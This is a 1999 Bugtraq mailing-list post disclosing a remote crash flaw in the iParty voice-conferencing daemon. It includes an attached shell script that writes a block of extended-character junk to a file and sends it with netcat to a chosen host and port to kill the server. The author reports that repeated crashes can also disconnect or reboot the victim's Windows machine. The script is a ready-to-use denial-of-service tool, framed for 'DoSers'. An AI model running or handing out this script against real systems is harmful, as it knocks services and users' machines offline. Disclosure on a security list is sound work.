Bugtraq mailing list archives
iParty Daemon Vulnerability w/ Exploit Code (worse than thought?)
From: bugtraq2 () HOTMAIL COM (wh00t X)
Date: Sat, 8 May 1999 13:11:34 EDT
This is a multi-part message in MIME format. ------=_NextPart_000_e6987ad_6338d761$45c2e550 Content-type: text/plain; format=flowed; Hi, iParty, by Intel Experimental Technologies Department, (unofficial information source at http://www.bumpkinland.com/iparty/), is a small voice conferencing program, which includes a server daemon in the download. It is handy for quick internet voice chat, but the server can be killed by sending a large amount of extended characters to the server port, which is 6004 by default, without being logged. The daemon either crashes quietly or GPF (varies from box to box). I've been told an advisory of some sort has already been released for this particular vulnerability but I believe the matter needs further attention because: 1. While there are other newer and better voice conferencing programs out, iParty continues to be widely used. 2. This vulnerability may be worse than thought: I tested my program (attached to message) against 4 random Windows 95/98 boxes with the daemon running, and after 2 or 3 crashes in a row, on top of crashing the iParty daemon, some experienced disconnection from the internet, ICQ and/or Rnaapp.exe, and one was even forced to reboot after the Rnaapp.exe crash. Thanks, Ka-wh00t _______________________________________________________________ Get Free Email and Do More On The Web. Visit http://www.msn.com ------=_NextPart_000_e6987ad_6338d761$45c2e550 Content-Type: text/plain; name="ippooper.sh" Content-Transfer-Encoding: 8bit Content-Disposition: attachment; filename="ippooper.sh" #!/bin/sh # iParty Pooper by Ka-wh00t (wh00t () iname com) - early May '99 - Created out of pure boredom. # iParty is a cute little voice conferencing program still widely used (much to my surprise.) # Unfortuneately, the daemon, that's included in the iParty download, can be shut down remotely. # And in some circumstances, this can lead to other Windows screw-ups (incidents included internet # disconnection, ICQ GPFs, Rnaapp crashes, etc.) Sometimes the daemon closes quietly, other times # a ipartyd.exe GPF. DoSers will hope for the GPF. At time of this script's release, the latest # (only?) version of iParty/iPartyd was v1.2 # FOR EDUCATIONAL PURPOSES ONLY. if [ "$1" = "" ]; then echo "Simple Script by Ka-wh00t to kill any iParty Server v1.2 and under. (ipartyd.exe)" echo "In some circumstances can also crash other Windows progs and maybe even Windows itself." echo "Maybe you'll get lucky." echo "" echo "Usage: $0 <hostname/ip> <port>" echo "Port is probably 6004 (default port)." echo "" echo "Remember: You need netcat for this program to work." echo "If you see something similar to 'nc: command not found', get netcat." else if [ "$2" = "" ]; then echo "I said the port is probably 6004, try that." exit else rm -f ipp00p cat > ipp00p << _EOF_ $6ì]}tTÕµ?"Ìap/HÔD0iAá½L%ÏÌEBEÔð'*}ÒyÓÔ¥(3êznÃuèÔj+¨°(ÖÖd'øZiXåËy7¡'``à¾½Ï Cµ¶ïüÖʹçî³ÏÞçì½Ï>çÜE¢6â^ßî^v¯?ì^¯:ÂÆ{n"uí£Ç'g=o¨§ 8ÂÓ'L5"ï鲱ᤸDRGÒIôlqYg»ÒiÆiÕ¾ëH¹Hwòá½²»Ô3ðl*oÎ#ésC9m, _EOF_ echo "" echo "Sending kill..." cat ipp00p | nc $1 $2 echo "Done." rm -f ipp00p fi fi ------=_NextPart_000_e6987ad_6338d761$45c2e550--
Current thread:
- SunOS 5.7 rmmount, no nosuid., (continued)
- SunOS 5.7 rmmount, no nosuid. Jonas Stahre (May 10)
- Re: SunOS 5.7 rmmount, no nosuid. C.J. Oster (May 10)
- nidsbench announcement Dug Song (May 13)
- Adminisrivia Aleph One (May 10)
- [BIND-BUGS #18] Non-delegated master domains Ian Carr-de Avelon (May 10)
- Re: [BIND-BUGS #18] Non-delegated master domains Andrew Brown (May 11)
- Re: [BIND-BUGS #18] Non-delegated master domains Dan Busarow (May 11)
- ICQ Password Revealer Dmitri Alperovitch (May 10)
- Re: Adminisrivia Brian Fisk (May 10)
- Bookmarks security vulnerabilities in both Internet Explorer 5.0 Georgi Guninski (May 09)